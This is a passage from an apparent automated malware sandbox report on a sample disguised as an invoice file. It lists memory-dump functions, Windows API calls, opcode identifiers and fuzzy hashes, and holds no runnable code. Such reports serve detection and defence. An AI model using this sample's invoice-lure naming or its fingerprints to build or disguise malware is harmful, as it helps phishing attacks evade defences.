                                            • Opcode ID: b8c77426cbb24cb739071eab8e579d0057e0d8ec05f1a30281abff2adc0eefc6
                                            • Instruction ID: d051bc8bba6a23f6667c137729abc05f311b3b23617018aacff6e8995a1d6b7b
                                            • Opcode Fuzzy Hash: b8c77426cbb24cb739071eab8e579d0057e0d8ec05f1a30281abff2adc0eefc6
                                            • Instruction Fuzzy Hash: 341112B69003498FDB14CFAAD444B9EFBF5AB48324F14842AD559B7210C3B9A545CFA4
                                            Function 04A51A18 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: ba1e64b4a8eacec4f592c53b8ca90b1385e3e2c97a78fe6bf7a0c2253a0a3742
                                            • Instruction ID: b79dd54e1abaf8253f51ccc2eaa99edb8af01f46467d96e273a3a1b43bb735d7
                                            • Opcode Fuzzy Hash: ba1e64b4a8eacec4f592c53b8ca90b1385e3e2c97a78fe6bf7a0c2253a0a3742
                                            • Instruction Fuzzy Hash: 13116AB1D003498FDB10DFAAC4457AFFBF4EF88720F208419D519A7240CB79A940CB95
                                            Function 00E8B078 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8B0DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2138876022.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_e80000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: af89e9aca8ff2f1c5093fbf8206b2d980ce1f225aefbb0b875e8248197e58f4e
                                            • Instruction ID: af296d18fd4a5cb79c9b5f4e4632a6653a9961e91426002bf9557182fb3eca2a
                                            • Opcode Fuzzy Hash: af89e9aca8ff2f1c5093fbf8206b2d980ce1f225aefbb0b875e8248197e58f4e
                                            • Instruction Fuzzy Hash: DC11F0B58006498BCB10DF9AC444B9EFBF4AB88324F20841AD429B7210D379A545CFA5
                                            Function 04A508D0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 04A54B25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 40d8c4a0877904af3644ab7e8e2223a119316abf41414e783ce5ed10c86a1f75
                                            • Instruction ID: c99229e7c6e60dfa1d5b0c2d33e2ebe93ea177c595b56d022d837f3ae6752bcb
                                            • Opcode Fuzzy Hash: 40d8c4a0877904af3644ab7e8e2223a119316abf41414e783ce5ed10c86a1f75
                                            • Instruction Fuzzy Hash: F411F5B58043499FDB10CF9AD984BDEBBF8EB48324F108459E918A7210D375A944CFA5
                                            Function 04A54AC0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 04A54B25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: b5d3f20b7b248a1bbddb784b10e23395cee704934664b7f8695d5ed938ca9263
                                            • Instruction ID: cfd51e524f1d766641673ab6e849484b136040122871b07855ab6d81d6ccb3fe
                                            • Opcode Fuzzy Hash: b5d3f20b7b248a1bbddb784b10e23395cee704934664b7f8695d5ed938ca9263
                                            • Instruction Fuzzy Hash: 2A11F5B5800349DFDB10CF9AD985BDEBBF8EB48724F10845AE918A7210C375A944CFA5
                                            Function 0AB23592 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *
                                            • API String ID: 0-163128923
                                            • Opcode ID: 0146d2e62c78c0886fbefc208700bfd0bbd5f46c2abdd9b038a7f38a28e8fcfb
                                            • Instruction ID: f0ce47d13501c69b95c560fa2c4a520b00aab9824ab75eb976759e8fd1579f5b
                                            • Opcode Fuzzy Hash: 0146d2e62c78c0886fbefc208700bfd0bbd5f46c2abdd9b038a7f38a28e8fcfb
                                            • Instruction Fuzzy Hash: 1D51C130E1821AEFEB15CFA4C8455ADBBF5FB08310F1005AAD01AAF350EB389941DF91
                                            Function 0AB28BA0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 3
                                            • API String ID: 0-1842515611
                                            • Opcode ID: 93838f357ce95112b8059014e924a33fe289f27e7000f0c9dd1058b9060b3276
                                            • Instruction ID: 8a1ed6a9fb89a43e32b89695f9516f202f7e28ac94331d952c66479081aa0f93
                                            • Opcode Fuzzy Hash: 93838f357ce95112b8059014e924a33fe289f27e7000f0c9dd1058b9060b3276
                                            • Instruction Fuzzy Hash: F521D63160E264DFE326DBD8D8509657B75EBC5254B2880EFD40E8B292CB339D02D791
                                            Function 0AB23528 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *
                                            • API String ID: 0-163128923
                                            • Opcode ID: 5139331691191e2c0817651496545d7ccc3ac47cb649280fc70b7310258bff99
                                            • Instruction ID: b714214978eeaecbf33a3732138066fbffb578ed6058cc84500bddd19fa29e74
                                            • Opcode Fuzzy Hash: 5139331691191e2c0817651496545d7ccc3ac47cb649280fc70b7310258bff99
                                            • Instruction Fuzzy Hash: 93D0A73144510CF7E754DA51DC0B79D7FBCD700618F640182F90DA6A41DBBA9B509282
                                            Function 0AB23538 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *
                                            • API String ID: 0-163128923
                                            • Opcode ID: 62e1defd2c479c3a40bdb41a28fa7fd76bb0828b36c67d928b08bef38240d2f3
                                            • Instruction ID: 2be5dcafd47964a0fa42b9a6a9b5ceabda7f718411f541ee215f293c8ee236ad
                                            • Opcode Fuzzy Hash: 62e1defd2c479c3a40bdb41a28fa7fd76bb0828b36c67d928b08bef38240d2f3
                                            • Instruction Fuzzy Hash: 73C01230509108FBEB98CE82E80B528BBFCA741A04F0000C6A90E66640DA751E00A782
                                            Function 0AB2371C Relevance: .4, Instructions: 418COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e78f1cefc61bc4d464876ebd7acb06e13aa3075d6aa26ea62390ad8a191ac73
                                            • Instruction ID: 3bfcc6c33bf60aec23c9625bb3ad5677f51a9c8e22b186b9d445b371daa1c927
                                            • Opcode Fuzzy Hash: 5e78f1cefc61bc4d464876ebd7acb06e13aa3075d6aa26ea62390ad8a191ac73
                                            • Instruction Fuzzy Hash: 6302C375A00114DFDB49CF98C988D59BBF2FF48324B1A8099E6099F276C736E851EF50
                                            Function 0AB228A0 Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b310145581b248fbff0e991322a3d3751a92b764ef2e3a63c8958ffe4e4f21b0
                                            • Instruction ID: d54a686d119bbcc732004eb1431dde0714baa7e7a2f9cd8504fc8927b779c1cb
                                            • Opcode Fuzzy Hash: b310145581b248fbff0e991322a3d3751a92b764ef2e3a63c8958ffe4e4f21b0
                                            • Instruction Fuzzy Hash: E4813C74600A048FD709EF38C854AAABBE6FFC9300F51896DD14A8B361DF71AD46CB90
                                            Function 0AB228B0 Relevance: .2, Instructions: 195COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cf024c3fca20c534674f91f070200717a2abdfad533b1d2ec841cf43648fa576
                                            • Instruction ID: f09c597328a6c846126f27123d5965e0305cd0e476fa2723a91bdfafff9c104d
                                            • Opcode Fuzzy Hash: cf024c3fca20c534674f91f070200717a2abdfad533b1d2ec841cf43648fa576
                                            • Instruction Fuzzy Hash: 8F812B34600A048FD749EF38D854AAABBE6FFC9300B51856DD14A8B361DF71AD46CB90
                                            Function 0AB2B4E8 Relevance: .2, Instructions: 173COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6ac9e7cd76128d2bea0eb0a0a8b991bd44dd6bb26fc84a4be97aacdd9040e6e
                                            • Instruction ID: c7d0e4bfe6a966725cb26c41b10168fb31ef99110dae890929ae3026579da244
                                            • Opcode Fuzzy Hash: b6ac9e7cd76128d2bea0eb0a0a8b991bd44dd6bb26fc84a4be97aacdd9040e6e
                                            • Instruction Fuzzy Hash: CF61F074E04218DFEB04DFAAC494AEDFBB6BF89300F10906AE409AB355DB345906DF40
                                            Function 0AB244F4 Relevance: .2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c148ebb530928ad65a2292bea0589c65005bd7fc4df4cb2b332baf9867002c5
                                            • Instruction ID: 57ef7d1cd5afefcefd43c26c63f12b46c36c26d7443e98a74db276a0d16cd112
                                            • Opcode Fuzzy Hash: 0c148ebb530928ad65a2292bea0589c65005bd7fc4df4cb2b332baf9867002c5
                                            • Instruction Fuzzy Hash: 1E51B031B002158FDB14EF79D8999AEBBF6EFC4310B14896AE419E7351EF309D028790
                                            Function 0AB232C9 Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 633a1079bbc6c9a85bf4898b247329bac7c8bc7595c7afc58a9bc12743f18687
                                            • Instruction ID: 16b432d9e2fec618f520da21939faef3b18add9dbd0598864a3b816b072d7b40
                                            • Opcode Fuzzy Hash: 633a1079bbc6c9a85bf4898b247329bac7c8bc7595c7afc58a9bc12743f18687
                                            • Instruction Fuzzy Hash: 33510E34B10118DFE754EFA9D85466EBBB6FBC8350B24806AE809DB385CE359D43CB91
                                            Function 0AB24C2F Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4dabfa52e77ffa54e72a4e4d3e5a9d76a4f181f1032b4a800dca07a3874b49a1
                                            • Instruction ID: bb768f29b7c89d71b52e8ca7fa475afe62dfab15dee64a4f3ccc466cd03dc337
                                            • Opcode Fuzzy Hash: 4dabfa52e77ffa54e72a4e4d3e5a9d76a4f181f1032b4a800dca07a3874b49a1
                                            • Instruction Fuzzy Hash: 2651D170909284DFE306DB6AE554A48BFF0EF4A301F2680C6D484DB6B3CB359E55CB12
                                            Function 0AB24DE0 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65c80f9c0e9dfee2ac2aba122e8dcdb8fccbaa53c59d87256cc935b49646c806
                                            • Instruction ID: 5f70312ee329b054b16abdba914feebb87c07384e013eecdd91aa8b5d8acb04a
                                            • Opcode Fuzzy Hash: 65c80f9c0e9dfee2ac2aba122e8dcdb8fccbaa53c59d87256cc935b49646c806
                                            • Instruction Fuzzy Hash: CE413C74D19229EFFB14DFA4E4848AEBBB4FB4E310F015896E40AA7B54D7309950DF18
                                            Function 0AB2BCF0 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87701e3947a6e1ef2dbc0bf45a70c2df467756e7a8f54d14c331ceda6da89cce
                                            • Instruction ID: f54af11e9cd720155f7d7482851ea083fddf920cc58fd3fd9994f29820bec161
                                            • Opcode Fuzzy Hash: 87701e3947a6e1ef2dbc0bf45a70c2df467756e7a8f54d14c331ceda6da89cce
                                            • Instruction Fuzzy Hash: AC4118B4D082289BEB08CFAAC4446EEFBF6FB88340F14D1AAD41DAB251DB345941DF54
                                            Function 0AB24DF0 Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab3e19806e5406c5541ecf7137701f27524d3ca7a08a9ca8fc68a5c61e159b55
                                            • Instruction ID: c249cc8167ed9e8dcd7b2906a7ddaa7c72b072e4f4bee3159bd81d8bafe402e3
                                            • Opcode Fuzzy Hash: ab3e19806e5406c5541ecf7137701f27524d3ca7a08a9ca8fc68a5c61e159b55
                                            • Instruction Fuzzy Hash: 52410C74D19229EFFB14DFA4E4848AEBBB4FB4D310F015896E41AA7B54D7309850DF24
                                            Function 0AB27BD8 Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0008c50144c5ae99137c32e33ca7d1a2509daf377f81dfb3891783a89ace22ea
                                            • Instruction ID: 9af89620209993f7694b598535380a51bdd7e0e31a080999c461892621824066
                                            • Opcode Fuzzy Hash: 0008c50144c5ae99137c32e33ca7d1a2509daf377f81dfb3891783a89ace22ea
                                            • Instruction Fuzzy Hash: 4E41A134204215EFE724DF58C880A76B7F2EBC8350B20C89AD55E9B655CB32EC92AB55
                                            Function 0AB256B3 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed01b30fba3a4c0f035b05e91e55df7469ad50015a6e5b7036111b96d0b550ff
                                            • Instruction ID: 9bb7d4f64f0fed9cd23609837aba708af8e6d7e5072bd17e78e9698944f6640b
                                            • Opcode Fuzzy Hash: ed01b30fba3a4c0f035b05e91e55df7469ad50015a6e5b7036111b96d0b550ff
                                            • Instruction Fuzzy Hash: AC41BD74E11229DFEB55CFA9C884AEDBBB2FB09300F109556E819FB220EB349941DF54
                                            Function 0AB2BCF4 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a792dcacaf03457788f4f3abff278256f026b0d2b5f9a41f4c8d586af58b5a1
                                            • Instruction ID: 6bf9085b2ba040bf78b6d3c835fce734c70fc771e375f4524861e0a9d73e496a
                                            • Opcode Fuzzy Hash: 5a792dcacaf03457788f4f3abff278256f026b0d2b5f9a41f4c8d586af58b5a1
                                            • Instruction Fuzzy Hash: A64129B4D082189BEB18CFAAC4446EEBBF6EF8C340F14D1AAE40DAB251DB344941DF54
                                            Function 0AB24F6E Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f89d954d27c21ae75ca410fa022a7dde8090374cb8e51286f2053b91757c5026
                                            • Instruction ID: 7d3a198664815f16669885bf7631668b939301daaf31446d884278b37686fe1e
                                            • Opcode Fuzzy Hash: f89d954d27c21ae75ca410fa022a7dde8090374cb8e51286f2053b91757c5026
                                            • Instruction Fuzzy Hash: 73412574E19229EFFB14DFA8E4848EDBBB0FB4D300F015896E41AA7A54DB309950DF24
                                            Function 0AB230E8 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c99968ab7d058f9912ce9682c1c391f6c2af93e43b4fc4019fc30aea9044915
                                            • Instruction ID: c075a07354e47d041b8cc2ed729bf2afbe61d4be963e6a7cbedec3e3884a9142
                                            • Opcode Fuzzy Hash: 9c99968ab7d058f9912ce9682c1c391f6c2af93e43b4fc4019fc30aea9044915
                                            • Instruction Fuzzy Hash: 6D41A034704154EBE315EE98C855B6ABBB2EBC8350F1484AEE41A9F3C5CF399C079B81
                                            Function 0AB21D8A Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fbc16b3176938d5c0d4630a33cae1f14fa843fdb7b160f1a0b9f8b1f40cceb2
                                            • Instruction ID: acfa618fed2b45f8fe6034a76718fcdf01a9f40737cdc14da40d464dedd3e097
                                            • Opcode Fuzzy Hash: 5fbc16b3176938d5c0d4630a33cae1f14fa843fdb7b160f1a0b9f8b1f40cceb2
                                            • Instruction Fuzzy Hash: 6831A732A00218ABEF15AF58F844AEE7B76EF44310F10856AF905A7354DB719D51EB90
                                            Function 0AB268D4 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2e1680f8b1fa2b893eb13414fea937ed6e378eafe491494039d4ad2d89f2732
                                            • Instruction ID: 60f5b3292559a11126a97d452c83b95cf9c1ef9ff480f688982c30e7201f79d9
                                            • Opcode Fuzzy Hash: b2e1680f8b1fa2b893eb13414fea937ed6e378eafe491494039d4ad2d89f2732
                                            • Instruction Fuzzy Hash: FB315C72904309AFDF14DFA9D885ADEBFF9EB48310F10846AE509E7210D775A940CFA4
                                            Function 0AB2CDE8 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a8be82c479b2177571037d6d6b9a7e3f41f8a04de054ae86569e1212579df3a
                                            • Instruction ID: 3cea1d1c6891029d54204829dfe90df38420c65b410c9646c02fbb7da344ef85
                                            • Opcode Fuzzy Hash: 0a8be82c479b2177571037d6d6b9a7e3f41f8a04de054ae86569e1212579df3a
                                            • Instruction Fuzzy Hash: 7C318D70919224EFFB14CF55D4849FEBBBABF8A300F1092A6E40DA7211C730A946DF90
                                            Function 0AB23132 Relevance: .1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d55aed058b3b0560ed48c1ce1239cd950cdb970e19899c9c1440899de7ca755
                                            • Instruction ID: 6143ae722f85b57fe211025f8dc882e041ef2ce3d04524829a1228e365d6d077
                                            • Opcode Fuzzy Hash: 2d55aed058b3b0560ed48c1ce1239cd950cdb970e19899c9c1440899de7ca755
                                            • Instruction Fuzzy Hash: E6315034704154EFE315EF98C85572ABBB2EBC8344F1484AED41A9F3C5CB7998039B41
                                            Function 0AB2B57E Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52108877188eaf1b995ec40bcff7b4d48bd070473c622eb061a59af5edc42706
                                            • Instruction ID: 557fc4d266aa0ecbb55646e160b5c46073492609f4d7926ceacfe44b02f072a5
                                            • Opcode Fuzzy Hash: 52108877188eaf1b995ec40bcff7b4d48bd070473c622eb061a59af5edc42706
                                            • Instruction Fuzzy Hash: 3131CE74E05218DFDB04DFA9C984AADFBB6FF48300F20906AE909AB355CB31A945DF00
                                            Function 0AB2AEE8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ccf686d6a1a19bc018bc115f762c83b017bd821954c59dc4ca6c5e67bf6ffc4b
                                            • Instruction ID: bf30c873585f4f49bab2b6ba48648614fbc80a90e24dc0b4d517ce1491ec5cf5
                                            • Opcode Fuzzy Hash: ccf686d6a1a19bc018bc115f762c83b017bd821954c59dc4ca6c5e67bf6ffc4b
                                            • Instruction Fuzzy Hash: 31312874D09229DFEB24DF68D884BEDBBB5FB49301F1095EAD00DA2205CB705985DF10
                                            Function 0AB2CD71 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee4825436e68665afefaa64d5a4c40d1c6df3e86b1981731993946924c971d3d
                                            • Instruction ID: acb0c184a7448fa3e1c5a44b322a929deacdfc4efc65c8160e92b124f9603c95
                                            • Opcode Fuzzy Hash: ee4825436e68665afefaa64d5a4c40d1c6df3e86b1981731993946924c971d3d
                                            • Instruction Fuzzy Hash: 0A310674D15228DFEB24CF65D844AADBBB6BF4A301F0091EAE40DA7251DB309985DF40
                                            Function 0AB2B480 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
